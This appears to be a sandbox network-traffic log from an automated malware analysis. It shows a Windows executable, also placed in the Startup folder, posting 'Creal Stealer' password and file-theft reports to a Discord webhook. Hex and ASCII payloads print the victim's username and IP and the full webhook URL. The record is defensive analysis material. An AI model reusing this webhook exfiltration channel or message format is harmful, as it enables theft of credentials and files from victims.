Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.8	49767	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:09 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 431 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:09 UTC	431	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer \| https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
2024-09-27 16:19:09 UTC	1337	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:09 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=39acd5087cec11efb895f699fc4aef6a; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 1 x-ratelimit-reset: 1727453951 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UYBtQdG4kfaJH1oGxcUbBE98sAkGM44PGnAfmSSdjCWbOQpwQDDP36%2BWTN5d29noNaqY93Mr9wiNUPpp3AOZAn665h%2B5iwEMOrAsK4SawZSIJURDTB%2FrXi8mF%2FQ1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=39acd5087cec11efb895f699fc4aef6a82a9b4750cdf7018f34d51969ca16372a8e4b35b98421de338c03f3e6a99687a; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:09 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6b 4a 6d 32 6f 51 61 35 50 45 58 62 35 67 4f 61 59 51 78 71 76 57 34 65 78 30 33 34 42 37 44 77 53 68 4d 4a 33 57 6c 33 62 32 77 2d 31 37 32 37 34 35 33 39 34 39 33 36 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 66 32 61 36 36 34 32 32 66 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=kJm2oQa5PEXb5gOaYQxqvW4ex034B7DwShMJ3Wl3b2w-1727453949365-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd04f2a66422f-EWR
2024-09-27 16:19:09 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.8	49768	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:09 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:09 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:09 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:09 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=39b2fb687cec11efabf4124b36f1d382; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453952 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LP2pxsaji1yu2xtmtTGdkDca6HJpJxjNMtqTAPHoxg9pY4V0MKCyKVGCLDgDRYlOdmmpVM0nJCr1XdZpDZYi2C93hmMJ8TPA7BFHyi6uGefr%2FSjxTplqq%2FT4qyJ2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=39b2fb687cec11efabf4124b36f1d382f2fee3e68b0b4e5fe8b64e54d41f7df1e72556bb6b42e6797270bd2db57f4579; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:09 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 64 45 4b 61 50 6c 64 6e 65 52 51 46 49 32 36 67 79 62 44 66 66 45 57 44 49 75 65 4e 31 6c 56 32 76 4b 73 63 32 74 6c 69 57 78 63 2d 31 37 32 37 34 35 33 39 34 39 34 30 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 66 35 61 66 64 34 32 63 65 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=dEKaPldneRQFI26gybDffEWDIueN1lV2vKsc2tliWxc-1727453949406-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd04f5afd42ce-EWR
2024-09-27 16:19:09 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.8	49769	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:09 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:09 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:19:09 UTC	1255	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 27 Sep 2024 16:19:09 GMT Content-Type: application/json Content-Length: 79 Connection: close retry-after: 1779 x-ratelimit-scope: user set-cookie: __dcfduid=39c915607cec11efb4620e62cbdde762; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453952 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLjD0hUl%2FNjWMZsG5czkXdaQIZAFc02fVzyM1RF%2F%2FDlqBcwrYGQfPxj1Ftdf%2FrhZ8C8Oj4LWF60Clf44bOLEanHScbhE8OtW5adMS%2BT7As3QNsyM9ilBcSUk5Nmo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=39c915607cec11efb4620e62cbdde762c0fc71884909540d5964f4bd73b55a9c1630117c694597cec1003809b88cba10; Expires=Wed, 26-Sep-2029 16:19:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
2024-09-27 16:19:09 UTC	347	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 34 65 61 63 33 34 34 38 39 62 36 31 31 36 33 38 30 32 61 63 66 34 65 61 66 66 30 31 63 61 33 33 33 38 38 38 33 37 66 35 2d 31 37 32 37 34 35 33 39 34 39 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 67 76 39 72 4e 33 70 31 42 36 6a 53 36 67 68 38 54 61 55 6e 57 52 59 72 37 54 39 6f 4a 78 6b 50 33 72 6d 59 4f 6c 4f 79 45 39 59 2d 31 37 32 37 34 35 33 39 34 39 35 35 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 Data Ascii: Set-Cookie: __cfruid=4eac34489b61163802acf4eaff01ca33388837f5-1727453949; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvid=gv9rN3p1B6jS6gh8TaUnWRYr7T9oJxkP3rmYOlOyE9Y-1727453949550-0.0.1.1-604800000; path=/; domain=.discor
2024-09-27 16:19:09 UTC	79	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 61 74 65 20 6c 69 6d 69 74 65 64 2e 22 2c 20 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 20 30 2e 33 2c 20 22 67 6c 6f 62 61 6c 22 3a 20 66 61 6c 73 65 7d Data Ascii: {"message": "You are being rate limited.", "retry_after": 0.3, "global": false}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.8	49770	162.159.136.232	443	4040	C:\Users\user\Desktop\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:09 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 506 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:09 UTC	506	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal \| File Stealer"}, "footer": {"text": "Creal Stealer \| ht
2024-09-27 16:19:10 UTC	1341	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:10 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3a164cd67cec11ef849f62361d7ce716; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453952 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXNDsMqm7ttp6WcPQ2B4Cq46UaSzT1mWwd%2FCX31hK7PYADbf2F4%2BweKuR9%2FYuHmELLnpSVyZ7nEKgGaRkBX%2FdTQtR6i%2BOFsvBmgHMhbaInYVsj%2BOOaXfdhwxZGk6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3a164cd67cec11ef849f62361d7ce7165874f6569c4d66a6206797eb89e1609cd010cdd05def258c2f3b2a794122a928; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:10 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6d 5f 4e 6b 74 61 67 7a 37 46 4b 30 55 4b 66 68 5a 6f 32 5a 54 49 54 6d 4c 77 43 71 6a 56 58 39 36 34 39 4e 61 47 7a 38 7a 62 6b 2d 31 37 32 37 34 35 33 39 35 30 30 35 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 35 33 38 66 32 30 30 63 64 35 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=m_Nktagz7FK0UKfhZo2ZTITmLwCqjVX9649NaGz8zbk-1727453950056-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0538f200cd5-EWR
2024-09-27 16:19:10 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.8	49771	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:10 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:10 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:19:10 UTC	1341	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:10 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3a31bc8c7cec11efa7e13ecf4d0a5a0d; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453953 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g9rDJixmcl5WsVw1If2Zhyta3ze6tpXE5d32kQflm17bjuwpIjvYMFOrSymWL%2BFoEvZdz%2BV%2B5HfLeDFxNX7NkbizaBnA%2Fr0NKc%2BC2JLkKjc6SQWqZOZxz%2Bxwps0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3a31bc8c7cec11efa7e13ecf4d0a5a0da95afac6e7c2e05e6e4f148e3440c6316bb8a89a4ff19078fc0bff73eee4be55; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:10 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 63 72 75 42 48 64 30 68 6e 62 68 55 6c 34 42 42 30 71 38 42 49 61 5a 59 31 70 55 4d 33 6b 6e 6e 71 5a 2e 79 79 39 59 4e 63 68 51 2d 31 37 32 37 34 35 33 39 35 30 32 33 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 35 34 38 38 34 36 38 63 63 36 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=cruBHd0hnbhUl4BB0q8BIaZY1pUM3knnqZ.yy9YNchQ-1727453950238-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd05488468cc6-EWR
2024-09-27 16:19:10 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.8	49772	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:10 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:10 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
